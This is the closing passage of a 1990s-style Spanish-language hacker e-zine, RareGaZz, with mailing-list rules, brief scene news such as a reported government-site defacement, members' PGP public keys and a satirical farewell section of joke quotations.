  encontrar en la pagina principal de RareGaZz:

	- Formas de suscribirse:
		1- Rellenando el formulario de nuestra Web
		2- Enviando  un e- mail a  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  poniendo en el
		   subject: 'suscribe direc@de.correo' donde direc@de.correo
		   es vuestra direccion de e-mail ... no me seais tan burros
		   de poner 'direc@de.correo' ... que ya han habido varios.
		3- Acceder  a la  pagina http://www.coollist.com  y rellenar,
		   abajo  del todo,  vuestros datos de  e-mail y  la lista de
		   correo  a la que  os  quereis suscribir;  en este caso, la
		   'raredudez' (sin comillas).

	- Formas de desuscribirse:
		1- Acceder  a la   pagina http://www.remove.coollist.com  y
		   rellenar vuestros datos de  e-mail y  la lista de correo
		   a la  que  os  quereis  desuscribir;  en  este caso,  la
		   'raredudez' (sin comillas).

	- Normas:
		* Las teneis todas en la  pagina principal de  nuestra Web.
		  Leerlas antes de suscribiros porque luego hay mucha gente
		  que rellena  el formulario  y pregunta ... que hago aqui?
		  que es esto? porque me mandais tantos mails? Joder!!!  no
		  sabeis leer?. Pues eso, que  leais bien las  normas antes
		  de suscribiros.

		* No preguntes tonterias. No quiero decir que la dudas de la
		  gente  iniciada sean  tonterias. Al  contrario,  para  eso
		  estamos!! pero  las preguntas  tipo: 'quiero  entrar en mi
		  colegio para cambiarme las notas, explicarme en breve como
		  lo  hago ... '.  $%&#@     merecen   ser  dados   de  baja
		  inmediatamente.

		* Puedes preguntar cosas sobre h/p/v/c, incluso  dudas sobre
		  configuracion  de Linux,  pero  ya  esta.  Tambien  puedes
		  comentar noticias o nuevos bugs.

		* Queda totalmente prohibido enviar attach en los mails (para
		  eso disponemos de un FTP anonimo).

	- Ventajas:
		* Si estas iniciandote todo son ventajas. Pero mejor primero
		  lee  y cuando te enteres mas ya escribiras. No digas cosas
		  de las que luego te vayas a arrepentir   :)

		* Te  enteraras de  cuando salen  nuevos numeros  de nuestro
		  e-zine, asi como de los e-zines de nuestros  compa�eros de
		  SET y  de JJFhackers, que  estan haciendo tambien  un buen
		  trabajo.

		* Conoceras mas hackers, posiblemente de tu ciudad.

		* Quedadas 'secretas' en el IRC. Solo para RareDudeZz.

		* De  vez en  cuando hacemos  estudios sobre la seguridad de
		  algun  server. Para ver  los posibles  agujeros que  pueda
		  tener.

		* Disponemos de un FTP anonimo donde intercambiar  programas
		  interesantes (no comerciales - no WareZz).

		* Aunque sean  muchos mails, son cortos y sin attach, por lo
		  que en 5 minutos los tienes todos en tu ordenador.

	- Inconvenientes:
		* La lista no  esta moderada. Puedes recibir mails que no te
		  interesen (y que tendras que soportar sin insultar  y sin)
		  meterte  con nadie ...  sino, seras  borrado  un mes de la
		  lista. Esto lo  digo porque ya  hemos tenido algun  ligero
		  problemilla  de gente  muy 'guay'  que piensa  que algunas
		  preguntas son  muy 'lamer' para  ellos. Por desgracia  hay
		  mucha gente asi. Te  lloran para que  les ense�es cosas  y
		  luego, cuando han  aprendido 'algo', vacilan  con los  mas
		  newbies, en vez de ense�arles. Y sino, leer el texto final
		  de Set 16 (extraido de un log del IRC) y ver como se creen
		  algunos que son 'guays' y resulta  que nada mas  que saben
		  'hablar'  y banear  a la  gente.  Se�ores,  ser  elite  no
		  consiste en conseguir 'op' en un  canal de hacking de IRC.

		* 20 o 30 mails diarios.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			   Undercon en Monterrey????
			   -------------------------

  Hablando sobre la RareDudeZz, se ha estado discutiendo la posibilidad
  de  hacer  un  Undercon en Monterrey, Mexico, se  ve  que  hay  mucho
  entusiasmo y ganas de lograr hacerlo.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			X-Ploit TEAM ataca de nuevo
			---------------------------

  El grupo mexicano de Crackers, clasificados asi por Rootshell, hizo de
  nuevo de las suyas en otro de los sites del gobierno mexicano, en esta
  ocasion  la  victima  fue www.sanpedro.gob.mx, que es un municipio del 
  estado de Nuevo Leon.

_______________________________________________________________________________
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

			 RaZa MeXiCaNa TEAM
			 ------------------

  Los se�ores(as) que se reunen en un canal denominado #RaZa_MeXicaNa, de
  los servidores de Red Latina del IRC han sacado el numero 1 y 2  de  su
  boletin de seguridad, este boletin(muy bueno por cierto) lo puedes
  encontrar en:


		     http://www.BigFoot.com/~RaZa-Mexicana


�[ L l a v e s  P G P ]��������������������������������������������������������

<<::RareGaZz::>> // 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use 

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
4XwaDg==
=crAP
-----END PGP PUBLIC KEY BLOCK-----

<<::Azumlord::>> // 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use 

mQENAzPjTJ8AAAEIAPK1KI9F97qe09G16Rstzd1tlELbGmgRy8UPyzUkvMOTXIS9
onTp5gM3VEg8vJjCT9QrHsz6g0qRzttCO/+ixiHakVK3pzRO8EudwCVVEDECwAmM
aTDdspOZEn/mwoIO/UsAHAxQAuXNXL4JqscJ/ZNAlySchJgVk5KngyqMXlqpmwNW
CO7Gh4Ese2saJ++xvXWQHb+iBLHd/xo3cvNeJg5dFT2W/AjXa4WS/pXFmr5v8tut
yQIxJ4gw1XnEkoKlPIRQXLmHqs0Ct9069FbomKcfxb7mKbIIcAOhBKzhRtCQGiwJ
1yZOz61feAmCZTGT+wIcq0UGSeaQRzAu7Fxr5k0ABRG0IEF6dW0gTG9yZCA8QXp1
bUxvcmRAaG90bWFpbC5jb20+iQEVAwUQM+NMoEcwLuxca+ZNAQHi8ggAoRY+l28w
xlFbSB+Fb32pvBrHjuTSTtsfJqtKMbwx9Ot++3TWW9G+WgeHtdlSnMXMlfe5+Ft2
MxQwXfqMR4OzgyBVnkoaPH0Z2PBz6Cij44sLCrEQ+nZnpPAMTe60NCRphKwbXMGK
h8TNlIxxxPxtZSzO40dO4Rw5EkJcUQyykHmyHtzz/Ld7YfGYQmMEn40r2oX1k0/4
c8iJ1zrnzG6aiLKsvbm33SUx4wr9Q/0eBXALpijgzEs9PSau/ByCWEOwPJVpK2tQ
MaBF4rfm53UJxOCUBU8zYbG1rNUTY6UpYvvffnyaPzPoIZd2reYxY5i44WJCEXMF
+aRDrCB+VURqtg==
=r674
-----END PGP PUBLIC KEY BLOCK-----

Cytorax // 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use 

mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0
e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD
95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR
tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn
TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ
FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz
oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s
=Xw7I
-----END PGP PUBLIC KEY BLOCK-----


Guybrush // 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use 

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
WT2KqINEIKul1WKXCwr6
=yQRv
-----END PGP PUBLIC KEY BLOCK-----


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           -=( DESPEDIDA??? )=-
                      >> p0r 4zU/|\l0rd Y Cy70r4x <<
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  NoTa: Solo apto para mentes rapidas, y claro con un poco de picardia
        mexicana.


             "No subira el dolar, ni el pan ni la tortilla...."
                     CSG antes de ocupar la presidencia

                   
                        "Espionaje????, nosotros???"
                     El FBI despues del caso Casa Blanca


               "Ya veras la transada que les doy a los gringos en esta
                operacion de compraventa..............."
                                     Santa Anna

                "Esos nacos gritones no me causan ni un dolor de
                 cabeza"
                          Maria Antonieta, Reina de Francia

                "No me volvere dictador aunque en ello me fuera
                 la vida.............."
                          Fidel Castro, Toma de Moncada

          "� Traidor yo ?, !Anda a chingar a la mas vieja de tu casa�"
                                     Judas



Esperamos que les halla gustado si tienen alguna duda o sugerencia favor de
comunicarlos a los telefonos 01-800-RareGaZz-HoTLiNe, nos vemos la proxima.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=